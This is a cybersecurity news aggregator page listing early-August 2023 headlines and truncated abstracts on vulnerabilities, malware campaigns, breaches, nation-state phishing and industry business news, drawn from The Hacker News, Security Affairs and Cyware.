Cybersecurity researchers have discovered a new high-severity security flaw in PaperCut print management software for Windows that could result in remote code execution under specific circumstances. Tracked as CVE-2023-39143 (CVSS score: 8.4), the flaw impacts PaperCut NG/MF prior to version 22.1.3. It has been described as a combination of a path traversal and file upload vulnerability. "CVE-2023-39143 enables unauthenticated attackers to potentially read, delete, and upload arbitrary files to the PaperCut MF/NG application server, resulting in remote code execution in certain configurations," Horizon3.ai's Naveen Sunkavally said. The cybersecurity firm said that file upload leading to remote code execution is possible when the external device integration setting is enabled, which is on by default in some installations of PaperCut. Earlier this April, another remote code execution vulnerability in the same product (CVE-2023-27350, CVSS score: 9.8) and an inforThe Hacker News
August 5, 2023 – Government
Government watchdog finds U.S. embassies running software vulnerable to attacks Full Text
Abstract
The assessment, which GAO began at the end of last year, also found that many State Department posts lack not only a chief information security officer, but any cybersecurity personnel whatsoever.Cyware
August 5, 2023 – Attack
Reptile Rootkit employed in attacks against Linux systems in South Korea Full Text
Abstract
Researchers observed threat actors that are using an open-source rootkit called Reptile in attacks aimed at systems in South Korea. Reptile is an open-source kernel module rootkit that was designed to target Linux systems, unlike other rootkits,...Security Affairs
August 5, 2023 – Malware
Malicious packages in the NPM designed for highly-targeted attacks Full Text
Abstract
The files and directories targeted by the malicious code could potentially contain developers' sensitive data. Researchers speculate the packages are part of a highly-targeted attack on developers working in the cryptocurrency sector.Cyware
August 5, 2023 – Vulnerabilities
New PaperCut flaw in print management software exposes servers to RCE attacks Full Text
Abstract
Researchers discovered a vulnerability in PaperCut NG/MF print management software that can lead to remote code execution. Cybersecurity researchers at Horizon3 discovered a high-severity vulnerability, tracked as CVE-2023-39143 (CVSS score: 8.4),...Security Affairs
August 4, 2023 – Breach
Mondee Security Lapse Exposed Flight Itineraries and Unencrypted Credit Card Numbers Full Text
Abstract
The database, hosted on Oracle’s cloud and more than 1.7 terabytes in size at the time it was exposed, contained customer’s personal information, including names, gender, dates of birth, home addresses, flight information and passport numbers.Cyware
August 04, 2023 – Policy and Law
NYC Couple Pleads Guilty to Money Laundering in $3.6 Billion Bitfinex Hack Full Text
Abstract
A married couple from New York City has pleaded guilty to money laundering charges in connection with the 2016 hack of cryptocurrency stock exchange Bitfinex, resulting in the theft of about 120,000 bitcoin. The development comes more than a year after Ilya Lichtenstein, 35, and his wife, Heather Morgan, 33, were arrested in February 2022, following the seizure of roughly 95,000 of the stolen crypto assets that were held by the defendants. The funds were valued at $3.6 billion at the time. Since then, the U.S. government said it has since seized another approximately $475 million tied to the breach. "Lichtenstein used a number of advanced hacking tools and techniques to gain access to Bitfinex's network," the U.S. Department of Justice (DoJ) said. "Once inside their systems, Lichtenstein fraudulently authorized more than 2,000 transactions in which 119,754 bitcoin was transferred from Bitfinex to a cryptocurrency wallet in Lichtenstein's control."The Hacker News
August 4, 2023 – Outage
A cyberattack impacted operations of multiple hospitals in several US states Full Text
Abstract
A cyberattack has disrupted the computer systems of multiple hospitals in several states, with a severe impact on their operations. Some emergency rooms in multiple hospitals in several states were forced to close and ambulances were diverted due to a cyberattack...Security Affairs
August 4, 2023 – Outage
Hawaiʻi’s Gemini North Observatory Suspends Operations Following Cyberattack Full Text
Abstract
The National Science Foundation’s NOIRLab did not respond to requests for comment but published a notice on Tuesday night explaining that the lab had discovered an attempted cyberattack on its systems that morning.Cyware
August 04, 2023 – Education
Webinar - Making PAM Great Again: Solving the Top 5 Identity Team PAM Challenges Full Text
Abstract
Privileged Access Management (PAM) solutions are widely acknowledged as the gold standard for securing critical privileged accounts. However, many security and identity teams face inherent obstacles during the PAM journey, hindering these solutions from reaching their full potential. These challenges deprive organizations of the resilience they seek, making it essential to address them effectively. Discover how you can enhance your PAM strategy in our upcoming webinar: "Solving the Top 5 PAM Pain Points Plaguing Identity Teams," featuring Yiftach Keshet from Silverfort. Reserve your spot now to gain invaluable insights. Gain insights into: Key Challenges: Identify the primary challenges identity teams encounter when implementing PAM solutions. Solutions & Approaches: Discover different strategies to effectively overcome these challenges and enhance your security posture. Unified Identity Protection: Learn how combining Unified Identity ProtectioThe Hacker News
August 4, 2023 – Criminals
Married couple pleaded guilty to laundering billions in cryptocurrency stolen from Bitfinex in 2016 Full Text
Abstract
A married couple from New York pleaded guilty this week to laundering billions of dollars stolen from Bitfinex in 2016. The couple pleaded guilty to money laundering charges in connection with the hack of the cryptocurrency exchange Bitfinex...Security Affairs
August 4, 2023 – Malware
Rilide Stealer Evolves to Target Chrome Extension Manifest V3 Full Text
Abstract
A more sophisticated version of the Rilide malware was identified targeting Chromium-based web browsers to steal sensitive data and cryptocurrency. Experts identified over 1,300 phishing websites distributing the new version of Rilide Stealer along with other harmful malware such as Bu ...Cyware
August 04, 2023 – Malware
Malicious npm Packages Found Exfiltrating Sensitive Data from Developers Full Text
Abstract
Cybersecurity researchers have discovered a new bunch of malicious packages on the npm package registry that are designed to exfiltrate sensitive developer information. Software supply chain firm Phylum, which first identified the "test" packages on July 31, 2023, said they "demonstrated increasing functionality and refinement," hours after which they were removed and re-uploaded under different, legitimate-sounding package names. While the end goal of the undertaking is not clear, it's suspected to be a highly targeted campaign aimed at the cryptocurrency sector based on references to modules such as "rocketrefer" and "binarium." All the packages were published by the npm user malikrukd4732. A common feature across all the modules is the ability to launch JavaScript ("index.js") that's equipped to exfiltrate valuable information to a remote server. "The index.js code is spawned in a child process by the preinstall.jThe Hacker News
August 4, 2023 – Malware
Malicious packages in the NPM designed for highly-targeted attacks Full Text
Abstract
Researchers discovered a new set of malicious packages on the npm package manager that can exfiltrate sensitive developer data. On July 31, 2023, Phylum researchers observed the publication of ten different "test" packages on the npm package manager...Security Affairs
August 4, 2023 – Insider Threat
Burger King Forgets to put a Password on Their Systems, Again Full Text
Abstract
On June 1st, 2023, the Cybernews research team discovered a publicly accessible environment file (.env) belonging to Burger King’s French website, containing various credentials. The file was hosted on the subdomain used for posting job offers.Cyware
August 04, 2023 – Government
Major Cybersecurity Agencies Collaborate to Unveil 2022’s Most Exploited Vulnerabilities Full Text
Abstract
A four-year-old critical security flaw impacting Fortinet FortiOS SSL has emerged as one of the most routinely and frequently exploited vulnerabilities in 2022. "In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems," cybersecurity and intelligence agencies from the Five Eyes nations, which comprise Australia, Canada, New Zealand, the U.K., and the U.S., said in a joint alert. The continued weaponization of CVE-2018-13379, which was also among the most exploited bugs in 2020 and 2021, suggests a failure on the part of organizations to apply patches in a timely manner, the authorities said. "Malicious cyber actors likely prioritize developing exploits for severe and globally prevalent CVEs," according to the advisory. "While sophisticated actors also develop tools to exploit other vulnerabilities, developing exploits for criThe Hacker News
August 4, 2023 – Attack
Attackers use dynamic code loading to bypass Google Play store’s malware detections Full Text
Abstract
Threat actors rely on the 'versioning' technique to evade malware detections of malicious code uploaded to the Google Play Store. Google Cybersecurity Action Team (GCAT) revealed that threat actors are using a technique called versioning to evade...Security Affairs
August 4, 2023 – Encryption
SCARF Cipher Sets New Standards in Protecting Sensitive Data Full Text
Abstract
The cipher, designed by Assistant Professor Rei Ueno from the Research Institute of Electrical Communication at Tohoku University, addresses the threat of cache side-channel attacks, offering enhanced security and exceptional performance.Cyware
August 4, 2023 – Government
CISA, FBI, and NSA published the list of 12 most exploited vulnerabilities of 2022 Full Text
Abstract
CISA, the FBI, and NSA, along with Five Eyes cybersecurity agencies published a list of the 12 most exploited vulnerabilities of 2022. CISA, the NSA, and the FBI, in collaboration with cybersecurity authorities from Australia, Canada, New Zealand,...Security Affairs
August 4, 2023 – General
These Are the Top Five Cloud Security Risks, Qualys Says Full Text
Abstract
The five key risk areas are misconfigurations, external-facing vulnerabilities, weaponized vulnerabilities, malware inside a cloud environment, and remediation lag (that is, delays in patching).Cyware
August 3, 2023 – Vulnerabilities
Google Chrome 115 Update Patches V8 JavaScript and WebAssembly Engine Vulnerabilities Full Text
Abstract
The browser update resolves three high-severity type confusion bugs in the V8 JavaScript and WebAssembly engine that earned the reporting researchers over $60,000 in bug bounties, Google notes in its advisory.Cyware
August 03, 2023 – Malware
Malicious Apps Use Sneaky Versioning Technique to Bypass Google Play Store Scanners Full Text
Abstract
Threat actors are leveraging a technique called versioning to evade Google Play Store's malware detections and target Android users. "Campaigns using versioning commonly target users' credentials, data, and finances," Google Cybersecurity Action Team (GCAT) said in its August 2023 Threat Horizons Report shared with The Hacker News. While versioning is not a new phenomenon, it's sneaky and hard to detect. In this method, a developer releases an initial version of an app on the Play Store that passes Google's pre-publication checks, but is later updated with a malware component. This is achieved by pushing an update from an attacker-controlled server to serve malicious code on the end user device using a method called dynamic code loading (DCL), effectively turning the app into a backdoor. Earlier this May, ESET discovered a screen recording app named "iRecorder - Screen Recorder" that remained innocuous for nearly a year after it was firstThe Hacker News
August 3, 2023 – Vulnerabilities
Decommissioned medical infusion pumps sold on secondary market could reveal Wi-Fi configuration settings Full Text
Abstract
Experts warn that decommissioned medical infusion pumps sold via the secondary market could expose Wi-Fi configuration settings. The sale of decommissioned medical infusion pumps through the secondary market may lead to the potential exposure of Wi-Fi...Security Affairs
August 3, 2023 – Breach
Canadian Healthcare Workers’ Private Information Subject to Data Breach Full Text
Abstract
Hackers had access to the HEABC system from May 9 to June 10 and the breach wasn’t detected until July 13, according to the association, after staff “identified a potential anomaly” but did not provide further explanation.Cyware
August 03, 2023 – Malware
New Version of Rilide Data Theft Malware Adapts to Chrome Extension Manifest V3 Full Text
Abstract
Cybersecurity researchers have discovered a new version of malware called Rilide that targets Chromium-based web browsers to steal sensitive data and cryptocurrency. "It exhibits a higher level of sophistication through modular design, code obfuscation, adoption to the Chrome Extension Manifest V3, and additional features such as the ability to exfiltrate stolen data to a Telegram channel or interval-based screenshot captures," Trustwave security researcher Pawel Knapczyk said in a report shared with The Hacker News. Rilide was first documented by the cybersecurity company in April 2023, uncovering two different attack chains that made use of Ekipa RAT and Aurora Stealer to deploy rogue browser extensions capable of data and crypto theft. It's sold on dark web forums by an actor named "friezer" for $5,000. The malware is equipped with a wide range of features that allow it to disable other browser add-ons, harvest browsing history and cookies,The Hacker News
August 3, 2023 – General
OWASP Top 10 for LLM (Large Language Model) applications is out! Full Text
Abstract
The OWASP Top 10 for LLM (Large Language Model) Applications version 1.0 is out; it focuses on the potential security risks when using LLMs. OWASP released the OWASP Top 10 for LLM (Large Language Model) Applications project, which provides a list...Security Affairs
August 3, 2023 – Business
Threat Intelligence Provider Cyble Raises $24 Million in Series B Funding Full Text
Abstract
The new funding round was co-led by Blackbird Ventures and King River Capital, with participation from January Capital, Spider Capital, Summit Peak Ventures, and other investors.Cyware
August 03, 2023 – Attack
Hundreds of Citrix NetScaler ADC and Gateway Servers Hacked in Major Cyber Attack Full Text
Abstract
Hundreds of Citrix NetScaler ADC and Gateway servers have been breached by malicious actors to deploy web shells, according to the Shadowserver Foundation. The non-profit said the attacks take advantage of CVE-2023-3519, a critical code injection vulnerability that could lead to unauthenticated remote code execution. The flaw, patched by Citrix last month, carries a CVSS score of 9.8. The largest number of impacted IP addresses are based in Germany, followed by France, Switzerland, Italy, Sweden, Spain, Japan, China, Austria, and Brazil. The exploitation of CVE-2023-3519 to deploy web shells was previously disclosed by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which said the attack was directed against an unnamed critical infrastructure organization in June 2023. The disclosure comes as GreyNoise said it detected three IP addresses attempting to exploit CVE-2023-24489 (CVSS score: 9.1), another critical flaw in Citrix ShareFile software thatThe Hacker News
August 3, 2023 – Vulnerabilities
Rapid7 found a bypass for the recently patched actively exploited Ivanti EPMM bug Full Text
Abstract
Researchers discovered a bypass for a recently fixed actively exploited vulnerability in Ivanti Endpoint Manager Mobile (EPMM). Rapid7 cybersecurity researchers have discovered a bypass for the recently patched actively exploited vulnerability in Ivanti...Security Affairs
August 3, 2023 – Breach
Pennsylvania County Says Data Breach May Have Exposed 690,000 People’s Personal Information Full Text
Abstract
The county says it, along with 22 million people worldwide, has been targeted by a global cyber security breach. The breach gave a group of cybercriminals access to personal information like driver's license numbers and Social Security numbers.Cyware
August 03, 2023 – Solution
A Penetration Testing Buyer’s Guide for IT Security Teams Full Text
Abstract
The frequency and complexity of cyber threats are constantly evolving. At the same time, organizations are now collecting sensitive data that, if compromised, could result in severe financial and reputational damage. According to Cybersecurity Ventures, the cost of cybercrime is predicted to hit $8 trillion in 2023 and will grow to $10.5 trillion by 2025. There is also increasing public and regulatory scrutiny over data protection. Compliance regulations (such as PCI DSS and ISO 27001), as well as the need for a better understanding of your cybersecurity risks, are driving the need to conduct regular penetration tests. Pen testing helps to identify security flaws in your IT infrastructure before threat actors can detect and exploit them. This gives you visibility into the risks posed by potential attacks and enables you to take swift corrective action to address them. Here, we outline key factors to consider before, during, and after the penetration testing process. Pre-PenetratiThe Hacker News
August 3, 2023
Russian APT29 conducts phishing attacks through Microsoft Teams Full Text
Abstract
Russia-linked APT29 group targeted dozens of organizations and government agencies worldwide with Microsoft Teams phishing attacks. Microsoft Threat Intelligence reported that Russia-linked cyberespionage group APT29 (aka SVR group, Cozy Bear, Nobelium,...Security Affairs
August 3, 2023 – Attack
Russian Hacker Group NoName057(16) Claims Attacks on Italian Banks, Government Agencies Full Text
Abstract
A pro-Russian hacking group has claimed responsibility for cyberattacks on Italian banks, businesses, and government agencies which flooded networks and disrupted services.Cyware
August 03, 2023 – General
Microsoft Flags Growing Cybersecurity Concerns for Major Sporting Events Full Text
Abstract
Microsoft is warning of the threat malicious cyber actors pose to stadium operations, noting that the cyber risk surface of live sporting events is "rapidly expanding." "Information on athletic performance, competitive advantage, and personal information is a lucrative target," the company said in a Cyber Signals report shared with The Hacker News. "Sports teams, major league and global sporting associations, and entertainment venues house a trove of valuable information desirable to cybercriminals." "Unfortunately, this information can be vulnerable at-scale, due to the number of connected devices and interconnected networks in these environments." The company specifically singled out hospitals delivering critical support and health services for fans and players as being targets of ransomware attacks, resulting in service disruptions. To defend against such attacks, Microsoft is recommending that - Companies disable unnecessary ports aThe Hacker News
August 3, 2023 – General
Report: One in 100 Emails is Malicious Full Text
Abstract
With the ever-increasing reliance on workplace technologies, including web-based tools and SaaS applications, organizations face an unparalleled need to strengthen their cybersecurity measures.Cyware
August 03, 2023 – Denial Of Service
“Mysterious Team Bangladesh” Targeting India with DDoS Attacks and Data Breaches Full Text
Abstract
A hacktivist group known as Mysterious Team Bangladesh has been linked to over 750 distributed denial-of-service (DDoS) attacks and 78 website defacements since June 2022. "The group most frequently attacks logistics, government, and financial sector organizations in India and Israel," Singapore-headquartered cybersecurity firm Group-IB said in a report shared with The Hacker News. "The group is primarily driven by religious and political motives." Some of the other targeted countries include Australia, Senegal, the Netherlands, Sweden, and Ethiopia. In addition, the threat actor is said to have gained access to web servers and administrative panels, likely by exploiting known security flaws or poorly-secured passwords. Mysterious Team Bangladesh, as the name indicates, is suspected to be of Bangladeshi origin. "We are working to protect Our Bangladesh Cyberspace," the group's Intro on Facebook reads. The group has an active social media preThe Hacker News
August 3, 2023 – Malware
New Variants of NodeStealer Found Infecting Facebook Business Accounts Full Text
Abstract
Unit 42 researchers discovered a previously unreported phishing campaign targeting Facebook business accounts. The campaign distributed new variants of NodeStealer malware that could fully take over these accounts, steal cryptocurrency, and download further payloads. This type of attack can cause b ...Cyware
August 03, 2023 – Phishing
Microsoft Exposes Russian Hackers’ Sneaky Phishing Tactics via Microsoft Teams Chats Full Text
Abstract
Microsoft on Wednesday disclosed that it identified a set of highly targeted social engineering attacks mounted by a Russian nation-state threat actor using credential theft phishing lures sent as Microsoft Teams chats. The tech giant attributed the attacks to a group it tracks as Midnight Blizzard (previously Nobelium). It's also called APT29, BlueBravo, Cozy Bear, Iron Hemlock, and The Dukes. "In this latest activity, the threat actor uses previously compromised Microsoft 365 tenants owned by small businesses to create new domains that appear as technical support entities," the company said. "Using these domains from compromised tenants, Midnight Blizzard leverages Teams messages to send lures that attempt to steal credentials from a targeted organization by engaging a user and eliciting approval of multi-factor authentication (MFA) prompts." Microsoft said the campaign, observed since at least late May 2023, affected fewer than 40 organizations globalThe Hacker News
August 03, 2023 – Vulnerabilities
Researchers Discover Bypass for Recently Patched Critical Ivanti EPMM Vulnerability Full Text
Abstract
Cybersecurity researchers have discovered a bypass for a recently fixed actively exploited vulnerability in some versions of Ivanti Endpoint Manager Mobile (EPMM), prompting Ivanti to urge users to update to the latest version of the software. Tracked as CVE-2023-35082 (CVSS score: 10.0) and discovered by Rapid7, the issue "allows unauthenticated attackers to access the API in older unsupported versions of MobileIron Core (11.2 and below)." "If exploited, this vulnerability enables an unauthorized, remote (internet-facing) actor to potentially access users' personally identifiable information and make limited changes to the server," Ivanti said in an advisory released on August 2, 2023. Rapid7 security researcher Stephen Fewer said, "CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application's security filter chain." With the latest disclosure, Ivanti hasThe Hacker News
August 2, 2023 – Breach
Hackers already installed web shells on 581 Citrix servers in CVE-2023-3519 attacks Full Text
Abstract
Researchers warn that hundreds of Citrix servers have been hacked in an ongoing campaign exploiting the RCE CVE-2023-3519. Security researchers from the non-profit organization Shadowserver Foundation reported that hundreds of Citrix NetScaler ADC and Gateway...Security Affairs
August 2, 2023 – Cryptocurrency
Millions Stolen From Crypto Platforms Through Exploited ‘Vyper’ Vulnerability Full Text
Abstract
Millions of dollars worth of cryptocurrency were stolen from several platforms over the weekend after hackers exploited a vulnerability in a programming language used widely in the cryptocurrency world.Cyware
August 2, 2023 – Phishing
Zero-day in Salesforce email services exploited in targeted Facebook phishing campaign Full Text
Abstract
Experts spotted a spear-phishing Facebook campaign exploiting a zero-day vulnerability in Salesforce email services. Researchers from Guardio Labs uncovered a sophisticated phishing campaign exploiting a zero-day vulnerability in Salesforce email...Security Affairs
August 2, 2023 – General
The Gap in Users’ Identity Security Knowledge Gives Cybercriminals an Opening Full Text
Abstract
With exponential growth in the number of human and machine actors on the network and more sophisticated technology in more places, identity in this new era is rapidly becoming a super-human problem, according to RSA.Cyware
August 02, 2023 – Hacker
Russian Cyber Adversary BlueCharlie Alters Infrastructure in Response to Disclosures Full Text
Abstract
A Russia-nexus adversary has been linked to 94 new domains starting March 2023, suggesting that the group is actively modifying its infrastructure in response to public disclosures about its activities. Cybersecurity firm Recorded Future linked the revamped infrastructure to a threat actor it tracks under the name BlueCharlie , a hacking crew that's broadly known by the names Blue Callisto, Callisto (or Calisto), COLDRIVER, Star Blizzard (formerly SEABORGIUM), and TA446. BlueCharlie was previously given the temporary designation Threat Activity Group 53 (TAG-53). "These shifts demonstrate that these threat actors are aware of industry reporting and show a certain level of sophistication in their efforts to obfuscate or modify their activity, aiming to stymie security researchers," the company said in a technical report shared with The Hacker News. BlueCharlie is assessed to be affiliated with Russia's Federal Security Service (FSB), with the threat actor linkedThe Hacker News
August 2, 2023 – Breach
Burger King forgets to put a password on their systems, again Full Text
Abstract
The fast food giant Burger King put their systems and data at risk by exposing sensitive credentials to the public for a second time. Original post @https://cybernews.com/security/burger-king-data-leak/ Burger King is a renowned US-based international...Security Affairs
August 2, 2023 – Business
Nile, Which Offers Enterprise Networks as a Service, Raises $175M Full Text
Abstract
Nile, a networking-as-a-service (NaaS) provider founded by former Cisco executive Pankaj Patel, has raised $175 million in a Series C funding round. The funding will be used for go-to-market growth and expanding the company's workforce.Cyware
August 02, 2023 – Phishing
Phishers Exploit Salesforce’s Email Services Zero-Day in Targeted Facebook Campaign Full Text
Abstract
A sophisticated Facebook phishing campaign has been observed exploiting a zero-day flaw in Salesforce's email services, allowing threat actors to craft targeted phishing messages using the company's domain and infrastructure. "Those phishing campaigns cleverly evade conventional detection methods by chaining the Salesforce vulnerability and legacy quirks in Facebook's Web Games platform," Guardio Labs researchers Oleg Zaytsev and Nati Tal said in a report shared with The Hacker News. The email messages masquerade as coming from Meta, while being sent from an email address with a "@salesforce.com" domain. They seek to trick recipients into clicking on a link by claiming that their Facebook accounts are undergoing a "comprehensive investigation" due to "suspicions of engaging in impersonation." The goal is to direct users to a rogue landing page that's designed to capture the victim's account credentials and two-factor autThe Hacker News
August 2, 2023 – Government
CISA adds second Ivanti EPMM flaw to its Known Exploited Vulnerabilities catalog Full Text
Abstract
US CISA added a second actively exploited Ivanti’s Endpoint Manager Mobile (EPMM) vulnerability to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added the second actively exploited Ivanti...Security Affairs
August 2, 2023 – Vulnerabilities
Firefox Fixes a Flurry of Flaws in the First of Two Releases This Month Full Text
Abstract
Mozilla has released a new version of Firefox, marking the first of two upgrades for the month. The patched flaws are tracked as CVE-2023-4045, CVE-2023-4047, CVE-2023-4048, CVE-2023-4050, CVE-2023-4051, CVE-2023-4057, and CVE-2023-4058.Cyware
August 02, 2023 – General
Industrial Control Systems Vulnerabilities Soar: Over One-Third Unpatched in 2023 Full Text
Abstract
About 34% of security vulnerabilities impacting industrial control systems (ICSs) that were reported in the first half of 2023 have no patch or remediation, registering a significant increase from 13% the previous year. According to data compiled by SynSaber, a total of 670 ICS product flaws were reported via the U.S. Cybersecurity and Infrastructure Security Agency (CISA) in the first half of 2023, down from 681 reported during the first half of 2022. Of the 670 CVEs, 88 are rated Critical, 349 are rated High, 215 are rated Medium, and 18 are rated Low in severity. 227 of the flaws have no fixes, in comparison to 88 in H1 2022. "Critical manufacturing (37.3% of total reported CVEs) and Energy (24.3% of the total reported) sectors are the most likely to be affected," the OT cybersecurity and asset monitoring company said in a report shared with The Hacker News. Other prominent industry verticals include water and wastewater systems, commercial facilities, communicationThe Hacker News
August 2, 2023 – Policy and Law
Lawsuit Alleges Bytedance’s Capcut App Secretly Reaps Massive Amounts of User Data Full Text
Abstract
CapCut and sister company TikTok are owned by the Chinese company ByteDance Ltd., which has long been under scrutiny by American officials concerned with how it collects and leverages American users’ personal data, allegedly including biometric data.Cyware
August 02, 2023 – General
Top Industries Significantly Impacted by Illicit Telegram Networks Full Text
Abstract
In recent years, the rise of illicit activities conducted within online messaging platforms has become a growing concern for countless industries. One of the most notable platforms that has hosted many malicious actors and nefarious activities is Telegram. Thanks to its accessibility, popularity, and user anonymity, Telegram has attracted a large number of threat actors driven by criminal purposes. Many cybercriminals have moved their operations into illicit Telegram channels in order to expand their reach and exploits to wider audiences. As a result, many of these illicit Telegram networks have negatively impacted many industries through the increase in cyberattacks and data leaks that have occurred across the globe. While any industry can be affected by the cybercriminals operating on Telegram, several industries are more significantly impacted by these illicit activities. In this post, we'll cover several of the common illicit activiThe Hacker News
August 2, 2023 – Policy and Law
Cyberattack on Montclair Township Led to $450K Settlement Full Text
Abstract
The Garden State Joint Insurance Fund made the deal as law enforcement began investigations into possible criminal charges, Joseph Hartnett, interim township manager, said Thursday.Cyware
August 02, 2023 – Vulnerabilities
Researchers Uncover AWS SSM Agent Misuse as a Covert Remote Access Trojan Full Text
Abstract
Cybersecurity researchers have discovered a new post-exploitation technique in Amazon Web Services (AWS) that allows the AWS Systems Manager Agent (SSM Agent) to be run as a remote access trojan on Windows and Linux environments. "The SSM agent, a legitimate tool used by admins to manage their instances, can be re-purposed by an attacker who has achieved high privilege access on an endpoint with SSM agent installed, to carry out malicious activities on an ongoing basis," Mitiga researchers Ariel Szarf and Or Aspir said in a report shared with The Hacker News. "This allows an attacker who has compromised a machine, hosted on AWS or anywhere else, to maintain access to it and perform various malicious activities." SSM Agent is software installed on Amazon Elastic Compute Cloud (Amazon EC2) instances that makes it possible for administrators to update, manage, and configure their AWS resources through a unified interface. The advantages of using an SSM AgentThe Hacker News
August 2, 2023 – Government
Possible Chinese Malware in US Systems a ‘Ticking Time Bomb’: Report Full Text
Abstract
The Biden administration believes China has implanted malware in key US power and communications networks in a “ticking time bomb” that could disrupt the military in event of a conflict, The New York Times reported Saturday.Cyware
August 02, 2023 – Criminals
Iranian Company Cloudzy Accused of Aiding Cybercriminals and Nation-State Hackers Full Text
Abstract
Services offered by an obscure Iranian company known as Cloudzy are being leveraged by multiple threat actors, including cybercrime groups and nation-state crews. "Although Cloudzy is incorporated in the United States, it almost certainly operates out of Tehran, Iran – in possible violation of U.S. sanctions – under the direction of someone going by the name Hassan Nozari," Halcyon said in a new report published Tuesday. The Texas-based cybersecurity firm said the company acts as a command-and-control provider (C2P), which provides attackers with Remote Desktop Protocol (RDP) virtual private servers and other anonymized services that ransomware affiliates and others use to pull off their cybercriminal endeavors. "[C2Ps] enjoy a liability loophole that does not require them to ensure that the infrastructure they provide is not being used for illegal operations," Halcyon said in a statement shared with The Hacker News. The ransomware-as-a-service (RaaS) busineThe Hacker News
August 02, 2023
Norwegian Entities Targeted in Ongoing Attacks Exploiting Ivanti EPMM Vulnerability Full Text
Abstract
Advanced persistent threat (APT) actors exploited a recently disclosed critical flaw impacting Ivanti Endpoint Manager Mobile (EPMM) as a zero-day since at least April 2023 in attacks directed against Norwegian entities, including a government network. The disclosure comes as part of a new joint advisory released by the Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) Tuesday. The exact identity or origin of the threat actor remains unclear. "The APT actors have exploited CVE-2023-35078 since at least April 2023," the authorities said. "The actors leveraged compromised small office/home office (SOHO) routers, including ASUS routers, to proxy to target infrastructure." CVE-2023-35078 refers to a severe flaw that allows threat actors to access personally identifiable information (PII) and gain the ability to make configuration changes on compromised systems. It can be chained with a second vulneThe Hacker News
August 1, 2023 – Business
Dynatrace Acquires Cloud-Native Debugging Platform Rookout Full Text
Abstract
Observability and security platform Dynatrace today announced that it plans to acquire Rookout, a Tel Aviv-based observability startup that focuses on helping developers troubleshoot and debug their code in production.Cyware
August 01, 2023 – Malware
New NodeStealer Targeting Facebook Business Accounts and Crypto Wallets Full Text
Abstract
Cybersecurity researchers have unearthed a Python variant of the stealer malware NodeStealer that's equipped to fully take over Facebook business accounts as well as siphon cryptocurrency. Palo Alto Networks Unit 42 said it detected the previously undocumented strain as part of a campaign that commenced in December 2022. NodeStealer was first exposed by Meta in May 2023, describing it as a stealer capable of harvesting cookies and passwords from web browsers to compromise Facebook, Gmail, and Outlook accounts. While the prior samples were written in JavaScript, the latest versions are coded in Python. "NodeStealer poses great risk for both individuals and organizations," Unit 42 researcher Lior Rochberger said. "Besides the direct impact on Facebook business accounts, which is mainly financial, the malware also steals credentials from browsers, which can be used for further attacks." The attacks start with bogus messages on Facebook that purportedly claiThe Hacker News
August 1, 2023 – Malware
NodeStealer 2.0 takes over Facebook Business accounts and targets crypto wallets Full Text
Abstract
Researchers spotted a Python variant of the NodeStealer that was designed to take over Facebook business accounts and cryptocurrency wallets. Palo Alto Networks Unit 42 discovered a previously unreported phishing campaign that distributed...Security Affairs
August 1, 2023 – Phishing
Iranian Hackers Posed as Israelis in Targeted LinkedIn Phishing Attack Full Text
Abstract
During the conversation, the malicious actors would send seemingly harmless attachments, such as invitations to conferences or files related to the targets’ professional interests, such as studies or articles.Cyware
August 01, 2023 – Attack
European Bank Customers Targeted in SpyNote Android Trojan Campaign Full Text
Abstract
Various European customers of different banks are being targeted by an Android banking trojan called SpyNote as part of an aggressive campaign detected in June and July 2023. "The spyware is distributed through email phishing or smishing campaigns and the fraudulent activities are executed with a combination of remote access trojan (RAT) capabilities and vishing attack," Italian cybersecurity firm Cleafy said in a technical analysis released Monday. SpyNote, also called SpyMax, is similar to other Android banking Trojans in that it requires Android's accessibility permissions in order to grant itself other necessary permissions and gather sensitive data from infected devices. What makes the malware strain notable is its dual function as spyware and as a bank fraud tool. The attack chains commence with a bogus SMS message urging users to install a banking app by clicking on the accompanying link, redirecting the victim to the legitimate TeamViewer QuickSupport aThe Hacker News
August 1, 2023 – Government
US govt is hunting a Chinese malware that can interfere with its military operations Full Text
Abstract
The US government believes that China has deployed malware in key US power and communications networks that can be activated in case of a conflict. American intelligence officials believe China has implanted malware in key US power and communications...Security Affairs
August 1, 2023 – Vulnerabilities
Stremio Vulnerability Exposes Millions to Attack Full Text
Abstract
CyFox researchers have discovered a DLL planting/hijacking vulnerability in popular media center application Stremio, which could be exploited by attackers to execute code on the victim’s system, steal information, and more.Cyware
August 01, 2023 – Education
What is Data Security Posture Management (DSPM)? Full Text
Abstract
Data Security Posture Management is an approach to securing cloud data by ensuring that sensitive data always has the correct security posture - regardless of where it's been duplicated or moved to. So, what is DSPM? Here's a quick example: Let's say you've built an excellent security posture for your cloud data. For the sake of this example, your data is in production, it's protected behind a firewall, it's not publicly accessible, and your IAM controls have limited access properly. Now along comes a developer and replicates that data into a lower environment. What happens to that fine security posture you've built? Well, it's gone - and now the data is only protected by the security posture in that lower environment. So if that environment is exposed or improperly secured - so is all that sensitive data you've been trying to protect. Security postures just don't travel with their data. Data Security Posture Management (DSPM) was creaThe Hacker News
August 1, 2023 – Malware
WikiLoader malware-as-a-service targets Italian organizations Full Text
Abstract
Threat actors are targeting Italian organizations with a phishing campaign aimed at delivering a new malware called WikiLoader. WikiLoader is a new piece of malware that is employed in a phishing campaign that is targeting Italian organizations....Security Affairs
August 1, 2023 – Attack
Meow Campaign Reaches Misconfigured Jupyter Notebook Instances Full Text
Abstract
The "Meow" campaign, targeting unsecured databases, has resurfaced, with the threat actor using misconfigured Jupyter Notebook instances to gather information and delete databases.Cyware
August 01, 2023 – Criminals
Researchers Expose Space Pirates’ Cyber Campaign Across Russia and Serbia Full Text
Abstract
